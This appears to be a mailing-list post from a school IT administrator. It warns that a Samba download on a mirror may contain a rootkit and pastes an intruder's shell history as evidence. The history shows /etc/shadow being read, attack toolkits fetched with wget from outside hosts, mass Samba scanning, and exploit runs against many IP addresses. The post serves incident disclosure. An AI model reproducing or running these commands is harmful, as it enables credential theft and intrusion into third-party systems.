http://ftp.cvut.cz/samba/samba-latest.tar.gz
AFAICS they are faked and contain some kind of rootkit (you can see this in the history below. the server this history is from is taken offline for security reasons, and nobody is there till 7th Jan I can't give you more details)
144 w 145 cat /etc/issue 146 uname -a 147 cat /etc/shadow 148 cd /usr/lib 149 wget http://ftp.cvut.cz/samba/samba-latest.tar.gz 150 5tar zxvf samba-latest.tar.gz 151 tar zxvf samba-latest.tar.gz 152 rm -rf samba-latest.tar.gz 153 cd samba-3.0.0/ 154 cd source/ 155 ./configure 156 ./make 157 ls 158 make 159 w 160 ls 161 cd .. 162 cd .. 163 cd .. 164 cd .. 165 ls 166 cat /etc/shadows 167 cat /etc/shadow 168 cat /etc/hosts 169 cat /proc/cpuinfo 170 socklsit 171 sockslist 172 w 173 killall -9 in.identd 174 killall -9 smbd 175 killall -9 nmbd 176 smbd -D 177 nmbd -D 178 5 locate in.identd 179 locate in.identd 180 cd /var/tmp 181 ls 182 cd .nlp 183 wget geocities.com/st3lly/cmd.tg 184 wget http://geocities.com/st3lly/cmd.tg 185 wget http://geocities.com/st3lly/cmd.tgz 186 tar zxvf cmd.tgz 187 cd cmd 188 ls 189 ./stealth 0 193.95.215.54 6666 6668 190 ./stealth 193.95.215.54 6666 6668 191 ./stealth 193.95.215.54 6667 192 w 193 cd /var/tmp 194 cd .nlp 195 wget http://members.xoom.it/pippo46/selena.tgz 196 wget http://62.211.66.12/pippo46/selena.tgz 197 tar zxvf selena.tgz 198 rm selena 199 rm selena.tgz 200 cd selena/ 201 ls 202 ./assl 212.213 203 uname -a 204 cd var/tmp/.nlp 205 ls 206 cd .nlp 207 cd /var/tmp 208 cd .nlp 209 ls 210 cd /tmp/ 211 cd rk 212 ls 213 wget http://members.xoom.it/vendett/psymag.tar.gz 214 wget http://62.211.66.12/vendett/psymag.tar.gz 215 tar zxvf psymag.tar.gz 216 rm psymag.tar.gz 217 cd psybnc 218 wget http://62.211.66.12/vendett/psybnc.conf 219 ./psybnc 220 cd .. 221 rm -fr psybnc 222 wget http://62.211.66.12/pippo46/asmb.tar 223 tar zyvf asmb.tar 224 tar zxvf asmb.tar 225 rm asmb.tar 226 cd w00t/ 227 ./asmb 120 228 ./asmb 110 229 ./asmb 217 230 ./asmb 217.229 231 cat woot.log 232 ./samba -b 0 -v 217.229.113.107 233 ./asmb 217.46 234 ./asmb 217.228 235 cd /tmp/rk 236 cd w00t/ 237 ./asmb 194.142 238 ./samba -b 0 -v 194.142.156.50 239 ./asmb 195.165 240 ./asmb 195.240 241 ./asmb 195.80 242 cat woot.log 243 ./samba -b 0 -v 217.229.113.107 244 ./samba -b 0 -v 217.229.203.3 245 ./samba -b 0 -v 217.229.230.36 246 cd /tmp 247 ls 248 cd rk 249 cd w00t/ 250 cat woot.log 251 ./samba -b 0 -v 81.182.126.85 252 ./samba -b 0 -v 81.182.126.85 253 cat woot.log 254 ./samba -b 0 -v 81.182.40.114 255 ./samba -b 0 -v 81.209 256 ./asmb 81.209 257 ./asmb 81.42 258 ./asmb 81.248 259 w 260 cd /var/tmp/.nlp 261 ls 262 cd .. 263 cd rk 264 cd /tmp/rk/.nlp 265 cd /tmp/ 266 cd rk 267 cd .nlp 268 cd w00t/ 269 ./asmb 195.97 270 ./asmb 195.166 271 ./asmb 81.183 272 cat woot.log 273 ./samba -b 0 -v 81.183.0.29 274 ./asmb 81.182 275 cat woot.log 276 ./samba -b 0 -v 81.182.40.114 277 ./samba -b 0 -v 81.182.40.114 278 ./samba -b 0 -v 81.182.40.114 279 ./samba -b 0 -v 81.182.90.152 280 cat woot.log 281 ./samba -b 0 -v 81.183.0.29 282 cat /proc/cpuinfo 283 cat /etc/hosts 284 w 285 cat /etc/issue 286 fuser -v 113/tcp 287 cat /etc/inetd.conf |grep -i ident 288 5vi /etc/inetd.conf 289 vi /etc/inetd.conf 290 vi /etc/inetd.conf 291 5killall -HUP inetd 292 killall -HUP inetd 293 cd /var/tmp 294 ls 295 cd /tmp 296 ls 297 cd rk 298 ls 299 cd .. 300 cd rk 301 wget http://members.xoom.it/vendett/psymag.tar.gz 302 wget http://62.211.66.12/vendett/psymag.tar.gz 303 tar zxvf psymag.tar.gz 304 ls 305 tar zxf psymag.tar.gz 306 tar zxvf psymag.tar.gz 307 tar xvfz psymag.tar.gz 308 rm psymag.tar.gz 309 ls 310 cd /usr/lib/.nlp 311 cd var/tmp 312 cd /var/tmp 313 ls 314 cd .nlp 315 ls 316 wget http://members.xoom.it/vendett/psymag.tar.gz 317 wget http://62.211.66.12/vendett/psymag.tar.gz 318 tar xvfz psymag.tar.gz 319 tar -xvfz psymag.tar.gz 320 rm psymag.tar.gz 321 w 322 wget http://62.211.66.12/pippo46/psy.tar.gz 323 tar zxvf psy.tar.gz 324 rm psy.tar.gz 325 wget http://62.211.66.12/pippo46/psyBNC2.3.1.tar 326 tar xf psyBNC2.3.1.tar 327 ls 328 cd psybnc. 329 cd psybnc 330 ls 331 wget http://62.211.66.12/pippo46/psybnc.conf 332 ./psybnc 333 ls 334 menuconf 335 ./menuconf 336 ./make 337 cd menuconf 338 ld 339 ld 340 ls 341 cd .. 342 ls 343 make 344 ls 345 ./psybnc 346 vi psybnc.conf 347 ./psybnc 348 vi psybnc.conf 349 ./psybnc 350 vi psybnc.conf 351 ./psybnc 352 cd .. 353 adduser 354 cd /tmo/rk/w00t 355 cd /tmp/rk/w00t 356 ./samba -b 0 -v 193.170.8.129 357 cd /tmp/rk/w00t 358 ./samba -b 0 -v 211.21.64.204 359 ./samba -b 0 -v 211.21.64.204 360 ./samba -b 0 -v 128.210.147.242 361 cd /tmp/rk/w00t 362 ./asmb 128.210 363 ./asmb 128.211 364 ./asmb 128.209 365 ./asmb 128 366 ./asmb 210.86 367 ./asmb 128 368 ./asmb 219 369 ./asmb 219.111 370 ./asmb 219.166 371 cat woot.log 372 ./samba -b 0 -v 219.166.79.186 373 ./samba -b 0 -v 219.166.81.34 374 ./asmb 219.80 375 cat woot.log 376 ./asmb 219.91 377 ./samba -b 0 -v 219.91.104.72 378 ./asmb 211.23 379 ./asmb 212.54 380 ./asmb 212.163 381 ./asmb 212.191 382 cd .. 383 wget xplo.150m.com/allsun.tgz 384 tar zxvf allsun.tgz 385 tar xf allsun.tgz 386 gunzip allsun.tgz 387 cd w00t/ 388 ./asmb 10.12 389 ./asmb 212.37 390 ./asmb 215 391 ./asmb 189 392 ./asmb 140 393 ./asmb 82.129 394 ./asmb 82.39 395 cd /tmp/rk 396 cd w00t/ 397 ./samba -b 0 -v 213.81.174.155 398 cat woot.log 399 cd .. 400 ls 401 cd w00t/ 402 ./asmb 213.81 403 cd /var/tmp/.nlp 404 cd selena/ 405 ls 406 ./ssx 407 cd /tmp 408 cd rk 409 cd w00t/ 410 ./asmb 210 411 ./asmb 210.146 412 ./asmb 210.192 413 ls 414 ./samba -b 0 -v 128.210.147.242 415 ./samba -b 0 -v 128.210.147.241 416 ./samba -b 0 -v 128.210.147.243 417 ./samba -b 0 -v 128.210.147.241 418 ./samba -b 0 -v 128.210.147.242 419 ./samba -b 0 -v 128.210.147.242 420 ./asmb 210.233 421 ./samba -b 0 -v 210.233.23.147 422 ./asmb 210.59 423 ./asmb 211 424 ./asmb 211.130 425 cat woot.lo 426 ./asmb 211.21 427 cat woot.log 428 ./samba -b 0 -v 211.21.64.204 429 ./asmb 211.22 430 ./asmb 212 431 ./asmb 212.37 432 ./asmb 212.101 433 ./asmb 212.185 434 ./asmb 212.36 435 ./asmb 212.80 436 ./asmb 214 437 ./asmb 158 438 ./asmb 02 439 ./asmb 82 440 ./asmb 82.161 441 ./asmb 82.255 442 cd /tmp/rk/w00t 443 ls 444 ./asmb 83 445 ./asmb 193.40 446 ./asmb 212.28 447 ./asmb 172 448 ./asmb 172.163 449 ./asmb 62.218 450 ./asmb 61.189 451 ./asmb 63 452 ./asmb 62.233 453 ./asmb 62.146 454 ./asmb 62.140 455 ./asmb 62 456 ./asmb 62.174 457 ./asmb 62.32 458 ./asmb 62.57 459 ./asmb 62.90 460 ./asmb 207.44 461 ./asmb 213.64 462 ./asmb 213.52 463 ./asmb 213.60 464 cat woot.log 465 ./samba -b 0 -v 213.60.109.1 466 ./samba -b 0 -v 213.60.109.1 467 wget http://members.xoom.it/pippo46/php.tar 468 tar xf php.tar 469 ls 470 cd php.tar 471 cd .. 472 cd php.tar 473 wget http://members.xoom.it/pippo46/php.tar 474 tar xf php.tar 475 ls 476 wget http://62.211.66.12/pippo46/php.tar 477 ./Start 62.162 478 ls 479 tar xf php.tar 480 tar zxvf php.tar 481 5http://www.zorgii.0catch.com/phpxpl.tar.gz 482 wget http://www.zorgii.0catch.com/phpxpl.tar.gz 483 tar zxvf phpxpl.tar.gz 484 5gunzip phpxpl.tar.gz 485 gunzip phpxpl.tar.gz 486 cd w00t/ 487 ./asmb 213.61 488 ./samba -b 0 -v 213.60.109.1 489 ./asmb 213.62 490 ./asmb 213.58 491 ./asmb 213.57 492 ./asmb 213.70 493 ./asmb 213.80 494 ./samba -b 0 -v 81.183.0.29 495 w 496 cd /var/tmp 497 cd /tmp/rk 498 cd w00t/ 499 ./samba -b 0 -v 211.22.94.147 500 ./samba -b 0 -v 194.95.226.21
--
\\\ ||| /// _\=/_
( @ @ ) (o o)
+--------oOOo-(_)-oOOo--------------------------oOOo-(_)-oOOo------+
| Markus Schabel TGM - Die Schule der Technik www.tgm.ac.at |
| IT-Service A-1200 Wien, Wexstrasse 19-23 net.tgm.ac.at |
| [EMAIL PROTECTED] Tel.: +43(1)33126/316 |
| [EMAIL PROTECTED] Fax.: +43(1)33126/154 |
| FSF Associate Member #597, Linux User #259595 (counter.li.org) |
| oOOo Yet Another Spam Trap: oOOo |
| ( ) oOOo [EMAIL PROTECTED] ( ) oOOo |
+--------\ (----( )--------------------------\ ( -----( )-----+
\_) ) / \_) ) /
(_/ (_/Computers are like airconditioners: They stop working properly if you open windows.
-- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
